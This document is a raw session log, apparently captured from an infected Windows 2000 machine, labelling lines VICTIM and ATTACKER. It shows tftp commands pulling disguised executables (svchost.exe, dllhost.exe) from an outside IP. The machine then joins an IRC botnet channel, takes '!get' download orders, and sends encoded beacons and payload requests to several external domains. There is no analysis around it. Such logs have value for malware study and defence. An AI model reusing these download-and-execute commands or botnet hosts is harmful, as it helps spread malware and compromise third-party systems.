VICTIM: Microsoft Windows 2000 [Version 5.00.2195] VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> VICTIM: dir wins\\dllhost.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> VICTIM: dir dllcache\\tftpd.exe VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> VICTIM: tftp -i 211.215.111.89 get svchost.exe wins\\SVCHOST.EXE VICTIM: \000\001svchost.exe\000octet\000 VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000' VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: \000\004\0004 VICTIM: \000\004\0005 VICTIM: \000\004\0006 VICTIM: \000\004\0007 VICTIM: \000\004\0008 VICTIM: \000\004\0009 VICTIM: \000\004\000: VICTIM: \000\004\000; VICTIM: \000\004\000< VICTIM: \000\004\000= VICTIM: \000\004\000> VICTIM: \000\004\000? VICTIM: \000\004\000@ VICTIM: \000\004\000A VICTIM: \000\004\000B VICTIM: \000\004\000C VICTIM: \000\004\000D VICTIM: \000\004\000E VICTIM: Transfer successful: 35088 bytes in 12 seconds, 2924 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: \000\001dllhost.exe\000octet\000 VICTIM: tftp -i 211.215.111.89 get dllhost.exe wins\\DLLHOST.EXE VICTIM: \000\004\000\001 VICTIM: \000\004\000\002 VICTIM: \000\004\000\003 VICTIM: \000\004\000\004 VICTIM: \000\004\000\005 VICTIM: \000\004\000\006 VICTIM: \000\004\000\007 VICTIM: \000\004\000\010 VICTIM: \000\004\000\t VICTIM: \000\004\000 VICTIM: \000\004\000\013 VICTIM: \000\004\000\014 VICTIM: \000\004\000 VICTIM: \000\004\000\016 VICTIM: \000\004\000\017 VICTIM: \000\004\000\020 VICTIM: \000\004\000\021 VICTIM: \000\004\000\022 VICTIM: \000\004\000\023 VICTIM: \000\004\000\024 VICTIM: \000\004\000\025 VICTIM: \000\004\000\026 VICTIM: \000\004\000\027 VICTIM: \000\004\000\030 VICTIM: \000\004\000\031 VICTIM: \000\004\000\032 VICTIM: \000\004\000\033 VICTIM: \000\004\000\034 VICTIM: \000\004\000\035 VICTIM: \000\004\000\036 VICTIM: \000\004\000\037 VICTIM: \000\004\000 VICTIM: \000\004\000! VICTIM: \000\004\000\ VICTIM: \000\004\000# VICTIM: \000\004\000\$ VICTIM: \000\004\000% VICTIM: \000\004\000& VICTIM: \000\004\000& VICTIM: \000\004\000' VICTIM: \000\004\000( VICTIM: \000\004\000) VICTIM: \000\004\000* VICTIM: \000\004\000+ VICTIM: \000\004\000, VICTIM: \000\004\000- VICTIM: \000\004\000. VICTIM: \000\004\000/ VICTIM: \000\004\0000 VICTIM: \000\004\0001 VICTIM: \000\004\0002 VICTIM: \000\004\0003 VICTIM: Transfer successful: 25600 bytes in 9 seconds, 2844 bytes/s VICTIM: C:\\WINNT\\system32> VICTIM: wins\\DLLHOST.EXE VICTIM: NICK jyqgvpxoUSER r020500 . . :_ VICTIM: Service Pack 2JOIN &virtu ATTACKER: :u. PRIVMSG jyqgvpxo :!get http:/image.perfectexe.com/kp.exe:u. PRIVMSG jyqgvpxo :!get http:/www.derquda.com/kb9.txt VICTIM: GET /kp.exe HTTP/1.0User-Agent: DownloadHost: image.perfectexe.comPragma: no-cache ATTACKER: GET /kb9.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/nop4.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/mno3.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/klm1.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /ert/lmn2.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache ATTACKER: GET /list.php?c=637B76A1D66060CC75920A2203465E8F28B12A11381A3EA94B7CBBFAD87FA69E7B45362B87F07B1597EE4ED43C79A785748ED32497EE1A40D2BD&v=2&t=0.1084558 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: exe3.perfectexe.com:255Connection: Keep-AlivePragma: no-cache ATTACKER: GET /list.php?c=A4BCF4239B2D51FDE20501295D189041D24B6A51B7950196427514550DAA4A72CFF178650077503E582149D38ACFFDDFB24857A04A3340119EEA&v=2&t=0.8562586 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /upload/int.exe?t=0.4614527 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: anotherdomainname.inConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=F2EC7490EB7BBE6C11FE6A5A5720D639FC634D28FDAC39F20D69A6E39139E2C829665146CEA1ABF58BB732AD5D53ABB3C33A249AF98DC2E3FE9B329BD1AA720387FB0A762DFCF16E8EB4AED455BB7CA328DF6D50AED0EDEB983A127F27CF90E4CD9B5B51D3C8339F2B98AD2AD7D77CE68F78052A87C07F588DD4325DCC7A902EFBF142EEC9E456E9B4823A68BE79215D&t=0.2036402 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=C4DA29CD6AFA09DBF718FDCDEC9BCB241A859EFB2F7ECF04E783EBAE67CF0B21CB84B0A7006FC59B497578E72A24031B9960A31D95E1446596F3B81179026D1CD7ABFB87DA0B06991B2143390AE4A679EA1D063B6F11ACAA79DBB6DB866E3044CE98505A28333995269531A70DF431B994612C728EDD96A7EAFEDBAEAF0DF10BDCCC329B5C680CCA63595A03F33360E360BF&t=0.9305384 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /1.exe?t=0.8443872 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 109.196.143.133Connection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=0D134EAAFC6C528222C8664CED9A13D063FB5A633665128A1D2A4E393593C39F3F6F859CF3CA9BA8BF8932A8AA977F6739FE8B6384E87D2CD9E92055A6DCBAD17C2C6BCF6DB8AB341228A8D2F719885747B0E6DBE698FEF862C05F32608824506D3B050F5A41B11D96255DDA17176CF6D52290BFEBACE3C4CF96BFD045F360DEFAFE983EECD919DF03362777894DA724&t=0.9154932 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /sn.php?c=D1CF7692E77727F7A349A9839BEC65A61880FEC7C390BD25E0D774032D8B5509D989879E3D048DBE3107BA203508362ECB0C739BB3DFFEAFE5D50B7E7B012F44F7A7268277A29A05DEE4403AFC12CD1239CE89B44F318D8B14B6F39E688080F4C3958983F6ED298511A20294A25B19919B6E96C898CB64567662106544E653A9180825815969589F7542045118DA47C768B2&t=0.2981836 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache ATTACKER: GET /tm/out.exe?t=8.446902E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: www.derquda.comConnection: Keep-AlivePragma: no-cache ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu ATTACKER: PONG :k. VICTIM: JOIN &virtu